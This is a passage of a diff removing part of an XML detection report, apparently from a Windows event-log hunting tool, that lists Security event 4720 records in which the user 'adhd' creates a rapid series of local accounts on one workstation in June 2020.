-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Donald</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4261</recordid>
-            <time>2020-06-11 22:04:54.530937200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.5309372Z'/&gt;&lt;EventRecordID&gt;4261&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Anthony&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1036&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Anthony&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Anthony</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4255</recordid>
-            <time>2020-06-11 22:04:54.440513100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.4405131Z'/&gt;&lt;EventRecordID&gt;4255&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jean&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1035&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jean&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jean</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4249</recordid>
-            <time>2020-06-11 22:04:54.341461300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.3414613Z'/&gt;&lt;EventRecordID&gt;4249&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Keith&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1034&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Keith&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Keith</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4243</recordid>
-            <time>2020-06-11 22:04:54.1830200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:54.0018302Z'/&gt;&lt;EventRecordID&gt;4243&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ruth&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1033&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ruth&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ruth</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4237</recordid>
-            <time>2020-06-11 22:04:53.918448700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.9184487Z'/&gt;&lt;EventRecordID&gt;4237&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Harold&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1032&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Harold&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Harold</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4231</recordid>
-            <time>2020-06-11 22:04:53.808575100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.8085751Z'/&gt;&lt;EventRecordID&gt;4231&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jose&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1031&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jose&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jose</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4225</recordid>
-            <time>2020-06-11 22:04:53.725813300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.7258133Z'/&gt;&lt;EventRecordID&gt;4225&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sara&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1030&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sara&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sara</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4219</recordid>
-            <time>2020-06-11 22:04:53.628418900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.6284189Z'/&gt;&lt;EventRecordID&gt;4219&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Timothy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1029&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Timothy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Timothy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4213</recordid>
-            <time>2020-06-11 22:04:53.552870700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:53.5528707Z'/&gt;&lt;EventRecordID&gt;4213&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ashley&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1028&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ashley&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

